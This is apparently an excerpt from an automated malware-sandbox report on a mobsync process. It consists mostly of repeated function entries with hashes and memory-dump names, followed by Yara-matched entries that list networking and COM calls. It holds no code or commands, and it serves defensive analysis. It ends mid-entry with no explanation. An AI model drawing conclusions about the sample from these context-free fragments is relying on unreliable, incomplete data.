                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_12_2_49f0000_mobsync.jbxd
                                                                    Similarity
                                                                    • API ID: InitializeThunk
                                                                    • String ID:
                                                                    • API String ID: 2994545307-0
                                                                    • Opcode ID: 7458e36a692b002dec64ba9381ef653c4080509ec4f55389c0baee40516db142
                                                                    • Instruction ID: 69741e7ad41814515100595de86ee2b4c58195401a2557be4bf5e590ed8ddf9e
                                                                    • Opcode Fuzzy Hash: 7458e36a692b002dec64ba9381ef653c4080509ec4f55389c0baee40516db142
                                                                    • Instruction Fuzzy Hash: 8490026260150042615071584C0840670059BE13053D6C129A0555560C861CD9559269
                                                                    Function 04A64340 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    Memory Dump Source
                                                                    • Source File: 0000000C.00000002.3750651781.00000000049F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 049F0000, based on PE: true
                                                                    • Associated: 0000000C.00000002.3750651781.0000000004B19000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                    • Associated: 0000000C.00000002.3750651781.0000000004B1D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                    • Associated: 0000000C.00000002.3750651781.0000000004B8E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_12_2_49f0000_mobsync.jbxd
                                                                    Similarity
                                                                    • API ID: InitializeThunk
                                                                    • String ID:
                                                                    • API String ID: 2994545307-0
                                                                    • Opcode ID: d16d57fc6063a14d57d4ac5aa94eadb4beb7e169e2370389b8f162c4b2fe01c7
                                                                    • Instruction ID: 62b0fe5ec1297cc18016c30fb8ff94198b1bee6e3fa471bf80aa9a75c607c8d0
                                                                    • Opcode Fuzzy Hash: d16d57fc6063a14d57d4ac5aa94eadb4beb7e169e2370389b8f162c4b2fe01c7
                                                                    • Instruction Fuzzy Hash: FD90023260580012B15071584C8854650059BE0305B96C025E0425554C8A18DA565361
                                                                    Function 04A62CA0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    Memory Dump Source
                                                                    • Source File: 0000000C.00000002.3750651781.00000000049F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 049F0000, based on PE: true
                                                                    • Associated: 0000000C.00000002.3750651781.0000000004B19000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                    • Associated: 0000000C.00000002.3750651781.0000000004B1D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                    • Associated: 0000000C.00000002.3750651781.0000000004B8E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_12_2_49f0000_mobsync.jbxd
                                                                    Similarity
                                                                    • API ID: InitializeThunk
                                                                    • String ID:
                                                                    • API String ID: 2994545307-0
                                                                    • Opcode ID: 6094be12fcf45b81e0e9da0d4029860fb1397a910b590061ac85e490c087a53e
                                                                    • Instruction ID: 176af6a5adb65d48119ec18f93838fc4d8125f59557f366e23454b3c90e23f54
                                                                    • Opcode Fuzzy Hash: 6094be12fcf45b81e0e9da0d4029860fb1397a910b590061ac85e490c087a53e
                                                                    • Instruction Fuzzy Hash: 7990023220140402F1107598580C64610058BE0305F96D025A5025555EC669D9916131
                                                                    Function 04A62C60 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    Memory Dump Source
                                                                    • Source File: 0000000C.00000002.3750651781.00000000049F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 049F0000, based on PE: true
                                                                    • Associated: 0000000C.00000002.3750651781.0000000004B19000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                    • Associated: 0000000C.00000002.3750651781.0000000004B1D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                    • Associated: 0000000C.00000002.3750651781.0000000004B8E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_12_2_49f0000_mobsync.jbxd
                                                                    Similarity
                                                                    • API ID: InitializeThunk
                                                                    • String ID:
                                                                    • API String ID: 2994545307-0
                                                                    • Opcode ID: 3665755eab25b125db30ad82e78b6394cc9b9e55727afacb53fdb572be63b90d
                                                                    • Instruction ID: 3aa5835412fef37e4a2821712cd6fb7a79862fa6cc21f50268d00bf549e112df
                                                                    • Opcode Fuzzy Hash: 3665755eab25b125db30ad82e78b6394cc9b9e55727afacb53fdb572be63b90d
                                                                    • Instruction Fuzzy Hash: 8490023220140842F11071584808B4610058BE0305F96C02AA0125654D8619D9517521
                                                                    Function 04A62C70 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMONLIBRARYCODE
                                                                    Download Yara Rule
                                                                    APIs
                                                                    Memory Dump Source
                                                                    • Source File: 0000000C.00000002.3750651781.00000000049F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 049F0000, based on PE: true
                                                                    • Associated: 0000000C.00000002.3750651781.0000000004B19000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                    • Associated: 0000000C.00000002.3750651781.0000000004B1D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                    • Associated: 0000000C.00000002.3750651781.0000000004B8E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_12_2_49f0000_mobsync.jbxd
                                                                    Similarity
                                                                    • API ID: InitializeThunk
                                                                    • String ID:
                                                                    • API String ID: 2994545307-0
                                                                    • Opcode ID: f8cfe734f982ec6285b14ad86d555473a82b076eab9503149ad8df4e9bd1924a
                                                                    • Instruction ID: 99a93c39940ec088978c8da55f54b1839bee3484f859e54ce8150e273901a837
                                                                    • Opcode Fuzzy Hash: f8cfe734f982ec6285b14ad86d555473a82b076eab9503149ad8df4e9bd1924a
                                                                    • Instruction Fuzzy Hash: 1D90023220148802F1207158880874A10058BD0305F9AC425A4425658D8699D9917121
                                                                    Function 04A62DF0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMONLIBRARYCODE
                                                                    Download Yara Rule
                                                                    APIs
                                                                    Memory Dump Source
                                                                    • Source File: 0000000C.00000002.3750651781.00000000049F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 049F0000, based on PE: true
                                                                    • Associated: 0000000C.00000002.3750651781.0000000004B19000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                    • Associated: 0000000C.00000002.3750651781.0000000004B1D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                    • Associated: 0000000C.00000002.3750651781.0000000004B8E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_12_2_49f0000_mobsync.jbxd
                                                                    Similarity
                                                                    • API ID: InitializeThunk
                                                                    • String ID:
                                                                    • API String ID: 2994545307-0
                                                                    • Opcode ID: 8b35e884b472d7771c11ce7b325414b3814bbf0c6594df7fff9f5e416df8e326
                                                                    • Instruction ID: 7b9d6b0e1ef65d33b9a92473d51cb298d65719ee24e74323622e63d7fabbb75b
                                                                    • Opcode Fuzzy Hash: 8b35e884b472d7771c11ce7b325414b3814bbf0c6594df7fff9f5e416df8e326
                                                                    • Instruction Fuzzy Hash: 2890023220140413F1217158490870710098BD0245FD6C426A0425558D965ADA52A121
                                                                    Function 04A62DD0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    Memory Dump Source
                                                                    • Source File: 0000000C.00000002.3750651781.00000000049F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 049F0000, based on PE: true
                                                                    • Associated: 0000000C.00000002.3750651781.0000000004B19000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                    • Associated: 0000000C.00000002.3750651781.0000000004B1D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                    • Associated: 0000000C.00000002.3750651781.0000000004B8E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_12_2_49f0000_mobsync.jbxd
                                                                    Similarity
                                                                    • API ID: InitializeThunk
                                                                    • String ID:
                                                                    • API String ID: 2994545307-0
                                                                    • Opcode ID: ee0ba4b8a27651daaa3b4257acb72d5ab3f0788ce9348d7796799653adaa9716
                                                                    • Instruction ID: 3e49b9a75363eb436afb09c3ccb3b8054f9d8da0bd877714d0da31c891c89b83
                                                                    • Opcode Fuzzy Hash: ee0ba4b8a27651daaa3b4257acb72d5ab3f0788ce9348d7796799653adaa9716
                                                                    • Instruction Fuzzy Hash: C8900222242441527555B158480850750069BE02457D6C026A1415950C852AE956D621
                                                                    Function 04A62D30 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMONLIBRARYCODE
                                                                    Download Yara Rule
                                                                    APIs
                                                                    Memory Dump Source
                                                                    • Source File: 0000000C.00000002.3750651781.00000000049F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 049F0000, based on PE: true
                                                                    • Associated: 0000000C.00000002.3750651781.0000000004B19000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                    • Associated: 0000000C.00000002.3750651781.0000000004B1D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                    • Associated: 0000000C.00000002.3750651781.0000000004B8E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_12_2_49f0000_mobsync.jbxd
                                                                    Similarity
                                                                    • API ID: InitializeThunk
                                                                    • String ID:
                                                                    • API String ID: 2994545307-0
                                                                    • Opcode ID: b49e98177f2a0b177dbede074c80d49e5fa9d5522790947edbe9fe853455fbbc
                                                                    • Instruction ID: 0474ffa2c2accb1565630aeb4d1a4947e107aeb47de195cb674e2efdfca15423
                                                                    • Opcode Fuzzy Hash: b49e98177f2a0b177dbede074c80d49e5fa9d5522790947edbe9fe853455fbbc
                                                                    • Instruction Fuzzy Hash: F490022230140003F1507158581C6065005DBE1305F96D025E0415554CD919D9565222
                                                                    Function 04A62D10 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMONLIBRARYCODE
                                                                    Download Yara Rule
                                                                    APIs
                                                                    Memory Dump Source
                                                                    • Source File: 0000000C.00000002.3750651781.00000000049F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 049F0000, based on PE: true
                                                                    • Associated: 0000000C.00000002.3750651781.0000000004B19000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                    • Associated: 0000000C.00000002.3750651781.0000000004B1D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                    • Associated: 0000000C.00000002.3750651781.0000000004B8E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_12_2_49f0000_mobsync.jbxd
                                                                    Similarity
                                                                    • API ID: InitializeThunk
                                                                    • String ID:
                                                                    • API String ID: 2994545307-0
                                                                    • Opcode ID: 95f2d1c6852d374ab1014128373d6c589e28b7fd8c254221eb464384e86b87f8
                                                                    • Instruction ID: 8f252bda14c6e5e9902559ffeccedb9486ced4342de1fd3eb92823ca48d6389a
                                                                    • Opcode Fuzzy Hash: 95f2d1c6852d374ab1014128373d6c589e28b7fd8c254221eb464384e86b87f8
                                                                    • Instruction Fuzzy Hash: E590022A21340002F1907158580C60A10058BD1206FD6D429A0016558CC919D9695321
                                                                    Function 04A62EE0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    Memory Dump Source
                                                                    • Source File: 0000000C.00000002.3750651781.00000000049F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 049F0000, based on PE: true
                                                                    • Associated: 0000000C.00000002.3750651781.0000000004B19000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                    • Associated: 0000000C.00000002.3750651781.0000000004B1D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                    • Associated: 0000000C.00000002.3750651781.0000000004B8E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_12_2_49f0000_mobsync.jbxd
                                                                    Similarity
                                                                    • API ID: InitializeThunk
                                                                    • String ID:
                                                                    • API String ID: 2994545307-0
                                                                    • Opcode ID: fde6b773fcc2f91800c0568add60a88e2d0725aa15d6f32efede79a0bf71702c
                                                                    • Instruction ID: e484c8e326dc6cfb36086d88ee4279555ff106329c33f93401093dc33665a473
                                                                    • Opcode Fuzzy Hash: fde6b773fcc2f91800c0568add60a88e2d0725aa15d6f32efede79a0bf71702c
                                                                    • Instruction Fuzzy Hash: 9090026220180403F15075584C0860710058BD0306F96C025A2065555E8A2DDD516135
                                                                    Function 04A62FB0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    Memory Dump Source
                                                                    • Source File: 0000000C.00000002.3750651781.00000000049F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 049F0000, based on PE: true
                                                                    • Associated: 0000000C.00000002.3750651781.0000000004B19000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                    • Associated: 0000000C.00000002.3750651781.0000000004B1D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                    • Associated: 0000000C.00000002.3750651781.0000000004B8E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_12_2_49f0000_mobsync.jbxd
                                                                    Similarity
                                                                    • API ID: InitializeThunk
                                                                    • String ID:
                                                                    • API String ID: 2994545307-0
                                                                    • Opcode ID: 16f9fe33236b80d19bd02d0ae0a608eb519389fefd76b1250d9cc2793d2fb3a9
                                                                    • Instruction ID: 660bede100d3853d2272d295a462512705b0715b0cabfbc41bc03e9e00beb926
                                                                    • Opcode Fuzzy Hash: 16f9fe33236b80d19bd02d0ae0a608eb519389fefd76b1250d9cc2793d2fb3a9
                                                                    • Instruction Fuzzy Hash: C190022260140042615071688C489065005AFE1215796C135A0999550D855DD9655665
                                                                    Function 04A62FE0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    Memory Dump Source
                                                                    • Source File: 0000000C.00000002.3750651781.00000000049F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 049F0000, based on PE: true
                                                                    • Associated: 0000000C.00000002.3750651781.0000000004B19000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                    • Associated: 0000000C.00000002.3750651781.0000000004B1D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                    • Associated: 0000000C.00000002.3750651781.0000000004B8E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_12_2_49f0000_mobsync.jbxd
                                                                    Similarity
                                                                    • API ID: InitializeThunk
                                                                    • String ID:
                                                                    • API String ID: 2994545307-0
                                                                    • Opcode ID: c6f087ee870fc80e043690859fa929f82cb2c2a7ede4b55af53eb03053f4d193
                                                                    • Instruction ID: fbf5bfbbc45ed66f6af7997807eb5d4364c1da422a273f99359938863ed2672a
                                                                    • Opcode Fuzzy Hash: c6f087ee870fc80e043690859fa929f82cb2c2a7ede4b55af53eb03053f4d193
                                                                    • Instruction Fuzzy Hash: 03900222211C0042F21075684C18B0710058BD0307F96C129A0155554CC919D9615521
                                                                    Function 04A62F30 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMONLIBRARYCODE
                                                                    Download Yara Rule
                                                                    APIs
                                                                    Memory Dump Source
                                                                    • Source File: 0000000C.00000002.3750651781.00000000049F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 049F0000, based on PE: true
                                                                    • Associated: 0000000C.00000002.3750651781.0000000004B19000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                    • Associated: 0000000C.00000002.3750651781.0000000004B1D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                    • Associated: 0000000C.00000002.3750651781.0000000004B8E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_12_2_49f0000_mobsync.jbxd
                                                                    Similarity
                                                                    • API ID: InitializeThunk
                                                                    • String ID:
                                                                    • API String ID: 2994545307-0
                                                                    • Opcode ID: cffe5dd0becc318a9c5f1abd4c4954ae817c310599c1f6ef82dec359c071c792
                                                                    • Instruction ID: 6ec962aa6ae27b237abbb9b7b13c0811a224a4deb54021090a708896bab5f1d5
                                                                    • Opcode Fuzzy Hash: cffe5dd0becc318a9c5f1abd4c4954ae817c310599c1f6ef82dec359c071c792
                                                                    • Instruction Fuzzy Hash: 4890026234140442F11071584818B061005CBE1305F96C029E1065554D861DDD526126
                                                                    Function 04A639B0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    Memory Dump Source
                                                                    • Source File: 0000000C.00000002.3750651781.00000000049F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 049F0000, based on PE: true
                                                                    • Associated: 0000000C.00000002.3750651781.0000000004B19000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                    • Associated: 0000000C.00000002.3750651781.0000000004B1D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                    • Associated: 0000000C.00000002.3750651781.0000000004B8E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_12_2_49f0000_mobsync.jbxd
                                                                    Similarity
                                                                    • API ID: InitializeThunk
                                                                    • String ID:
                                                                    • API String ID: 2994545307-0
                                                                    • Opcode ID: 485082eb3ac68991bf7234e05eb06883e7cb120564c0bf5c1e264151a41b206a
                                                                    • Instruction ID: a062b9a05b3a2e68631c8d7646a2e80593c584d2b18b403313bfe6d545388907
                                                                    • Opcode Fuzzy Hash: 485082eb3ac68991bf7234e05eb06883e7cb120564c0bf5c1e264151a41b206a
                                                                    • Instruction Fuzzy Hash: 9590022224545102F160715C48086165005ABE0205F96C035A0815594D8559D9556221
                                                                    Function 04A62AF0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    Memory Dump Source
                                                                    • Source File: 0000000C.00000002.3750651781.00000000049F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 049F0000, based on PE: true
                                                                    • Associated: 0000000C.00000002.3750651781.0000000004B19000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                    • Associated: 0000000C.00000002.3750651781.0000000004B1D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                    • Associated: 0000000C.00000002.3750651781.0000000004B8E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_12_2_49f0000_mobsync.jbxd
                                                                    Similarity
                                                                    • API ID: InitializeThunk
                                                                    • String ID:
                                                                    • API String ID: 2994545307-0
                                                                    • Opcode ID: 56227a90c7921e7cbdfeb750963137beedc7df615703445fbb6da685e8823a1f
                                                                    • Instruction ID: 6684fb30280a1acf9e3bf1d1a6c87660099beb252a98669a1083dee61df91671
                                                                    • Opcode Fuzzy Hash: 56227a90c7921e7cbdfeb750963137beedc7df615703445fbb6da685e8823a1f
                                                                    • Instruction Fuzzy Hash: DC900226221400022155B5580A0850B14459BD63553D6C029F1417590CC625D9655321
                                                                    Function 04A62AD0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    Memory Dump Source
                                                                    • Source File: 0000000C.00000002.3750651781.00000000049F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 049F0000, based on PE: true
                                                                    • Associated: 0000000C.00000002.3750651781.0000000004B19000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                    • Associated: 0000000C.00000002.3750651781.0000000004B1D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                    • Associated: 0000000C.00000002.3750651781.0000000004B8E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_12_2_49f0000_mobsync.jbxd
                                                                    Similarity
                                                                    • API ID: InitializeThunk
                                                                    • String ID:
                                                                    • API String ID: 2994545307-0
                                                                    • Opcode ID: 4c05fffa012c0a17e2a5976e856be3e348aeed1962deb5c0168374360a497e34
                                                                    • Instruction ID: 291929a9e209d5a89190d0acfdf062a03a9f7b735a40144d60932b619c709525
                                                                    • Opcode Fuzzy Hash: 4c05fffa012c0a17e2a5976e856be3e348aeed1962deb5c0168374360a497e34
                                                                    • Instruction Fuzzy Hash: 44900226211400032115B5580B0850710468BD5355396C035F1016550CD625D9615121
                                                                    Function 04A62B60 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMONLIBRARYCODE
                                                                    Download Yara Rule
                                                                    APIs
                                                                    Memory Dump Source
                                                                    • Source File: 0000000C.00000002.3750651781.00000000049F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 049F0000, based on PE: true
                                                                    • Associated: 0000000C.00000002.3750651781.0000000004B19000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                    • Associated: 0000000C.00000002.3750651781.0000000004B1D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                    • Associated: 0000000C.00000002.3750651781.0000000004B8E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_12_2_49f0000_mobsync.jbxd
                                                                    Similarity
                                                                    • API ID: InitializeThunk
                                                                    • String ID:
                                                                    • API String ID: 2994545307-0
                                                                    • Opcode ID: 8bdd60c90e5412da3b75e3817972bf41a6acd0893f707f875200939ce16dbb06
                                                                    • Instruction ID: 262ba4b2b08e9d312f2650b1083b6d9bd9de61b0f80239f7ca35508b2ac1cf15
                                                                    • Opcode Fuzzy Hash: 8bdd60c90e5412da3b75e3817972bf41a6acd0893f707f875200939ce16dbb06
                                                                    • Instruction Fuzzy Hash: 7790026220240003611571584818616500A8BE0205B96C035E1015590DC529D9916125
                                                                    Function 007FF57A Relevance: 4.6, APIs: 2, Strings: 1, Instructions: 102COMMON
                                                                    Download Yara Rule

                                                                    Control-flow Graph

                                                                    • Executed
                                                                    • Not Executed
                                                                    control_flow_graph 772 7ff57a-7ff5dc CoInitialize 773 7ff5e5-7ff5e7 772->773 774 7ff5ed-7ff5fe 773->774 775 7ff67b-7ff68b CoUninitialize 773->775 777 7ff670-7ff678 774->777 778 7ff600-7ff610 774->778 777->775 780 7ff615-7ff617 778->780 781 7ff619-7ff61e 780->781 782 7ff662-7ff66d 780->782 783 7ff65a-7ff660 781->783 784 7ff620-7ff62d call 80b8e0 781->784 782->777 783->778 783->782 788 7ff62f-7ff631 784->788 789 7ff634-7ff656 call 80b6e0 call 80b4c0 784->789 788->789 789->783
                                                                    APIs
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 0000000C.00000002.3741834326.00000000007E0000.00000040.80000000.00040000.00000000.sdmp, Offset: 007E0000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_12_2_7e0000_mobsync.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID: InitializeUninitialize
                                                                    • String ID: @J7<
                                                                    • API String ID: 3442037557-2016760708
                                                                    • Opcode ID: 96b0881fd07dff17c59dfce60016d8e8923d03334d2525125ce0c832c77777f4
                                                                    • Instruction ID: d08685eaacc33d9f83524d711fa07932ce42497a0306363969fdec2f535e30bf
                                                                    • Opcode Fuzzy Hash: 96b0881fd07dff17c59dfce60016d8e8923d03334d2525125ce0c832c77777f4
                                                                    • Instruction Fuzzy Hash: 23311275A00609AFDB00DFD8C8809EEB7B9FF48304B108559E515E7354DB75AE458BA0
                                                                    Function 007FF580 Relevance: 4.6, APIs: 2, Strings: 1, Instructions: 101COMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 0000000C.00000002.3741834326.00000000007E0000.00000040.80000000.00040000.00000000.sdmp, Offset: 007E0000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_12_2_7e0000_mobsync.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID: InitializeUninitialize
                                                                    • String ID: @J7<
                                                                    • API String ID: 3442037557-2016760708
                                                                    • Opcode ID: ed75d6616b26e0c3adbeb4f1aea2539e4430a090231e29fb9bcc86b23fd5cf95
                                                                    • Instruction ID: 92dc7fb661812d406fe8e82f603351f508f83187c1bd5b4bfc955e4d40fed369
                                                                    • Opcode Fuzzy Hash: ed75d6616b26e0c3adbeb4f1aea2539e4430a090231e29fb9bcc86b23fd5cf95
                                                                    • Instruction Fuzzy Hash: 8A312175A00609AFDB00DFD8CC809EEB7B9FF88304B108559E515EB354DB75EE058BA0
                                                                    Function 00803B10 Relevance: 3.1, APIs: 1, Strings: 1, Instructions: 107sleepCOMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • Sleep.KERNELBASE(000007D0), ref: 00803BDD
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 0000000C.00000002.3741834326.00000000007E0000.00000040.80000000.00040000.00000000.sdmp, Offset: 007E0000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_12_2_7e0000_mobsync.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID: Sleep
                                                                    • String ID: wininet.dll
                                                                    • API String ID: 3472027048-3354682871
                                                                    • Opcode ID: dad42f9425a0be8bfe4aedd0d3202683c3911ffb27a686497fa1a9228a725e0c
                                                                    • Instruction ID: 630630828abe78caa040e45786d3bb6367d172ffefb6ad9599a2c1a98ba16bf7
                                                                    • Opcode Fuzzy Hash: dad42f9425a0be8bfe4aedd0d3202683c3911ffb27a686497fa1a9228a725e0c
                                                                    • Instruction Fuzzy Hash: BA316CB1601705ABD714DFA4CC85FEBB7B8FB88714F104518FA19AB281D770AA50CBA5
                                                                    Function 007F1B50 Relevance: 1.8, APIs: 1, Instructions: 267networkCOMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • WSAStartup.WS2_32(00000202,?), ref: 007F1E47
                                                                    Memory Dump Source
                                                                    • Source File: 0000000C.00000002.3741834326.00000000007E0000.00000040.80000000.00040000.00000000.sdmp, Offset: 007E0000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_12_2_7e0000_mobsync.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID: Startup
                                                                    • String ID:
                                                                    • API String ID: 724789610-0
                                                                    • Opcode ID: 4470723ee3262db500b3f4f9e3ef814e750869777184048a513af10152822a77
                                                                    • Instruction ID: c071a29fe40e8d240a51131fc216706f6658f09995cc2921581792e1c45163f6
                                                                    • Opcode Fuzzy Hash: 4470723ee3262db500b3f4f9e3ef814e750869777184048a513af10152822a77
                                                                    • Instruction Fuzzy Hash: 4D917C71E00209EFDB54DFA9CC45BEEB7B8BF48704F544129E608E7281E7746A04CBA5
                                                                    Function 007F84AF Relevance: 1.6, APIs: 1, Instructions: 117COMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • GetFileAttributesW.KERNELBASE(?), ref: 007F847A
                                                                    Memory Dump Source
                                                                    • Source File: 0000000C.00000002.3741834326.00000000007E0000.00000040.80000000.00040000.00000000.sdmp, Offset: 007E0000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_12_2_7e0000_mobsync.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID: AttributesFile
                                                                    • String ID:
                                                                    • API String ID: 3188754299-0
                                                                    • Opcode ID: eafe77c9c000052e91b0869083202efc1ca2d9f42041edd40a6d132cfb4796b9
                                                                    • Instruction ID: 0450ddb22095de117769a94bcbadfcdb5a7c0a72d53861df41a6e15518feb6cc
                                                                    • Opcode Fuzzy Hash: eafe77c9c000052e91b0869083202efc1ca2d9f42041edd40a6d132cfb4796b9
                                                                    • Instruction Fuzzy Hash: 973135B21106999FDF81EB74C9863F53BA5EB15360B5C0949D5828F253EA29C806CF83
                                                                    Function 007F1DAD Relevance: 1.6, APIs: 1, Instructions: 72networkCOMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • WSAStartup.WS2_32(00000202,?), ref: 007F1E47
                                                                    Memory Dump Source
                                                                    • Source File: 0000000C.00000002.3741834326.00000000007E0000.00000040.80000000.00040000.00000000.sdmp, Offset: 007E0000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_12_2_7e0000_mobsync.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID: Startup
                                                                    • String ID:
                                                                    • API String ID: 724789610-0
                                                                    • Opcode ID: 953fd33db263d66204f48021afca69beda3239a1d111d1df2d087bbf96fd00cd
                                                                    • Instruction ID: 400284d5c75d4b92c49cbd7b13c52df431279eb9cdfe2432d95514c8c7b34ac9
                                                                    • Opcode Fuzzy Hash: 953fd33db263d66204f48021afca69beda3239a1d111d1df2d087bbf96fd00cd
                                                                    • Instruction Fuzzy Hash: 1211D271D01308EFDB00DBA48C46BEEB7B8AF49300F100196EA08F7242E6746F4887E6
                                                                    Function 007F4680 Relevance: 1.5, APIs: 1, Instructions: 48libraryloaderCOMMON
                                                                    Download Yara Rule
                                                                    APIs
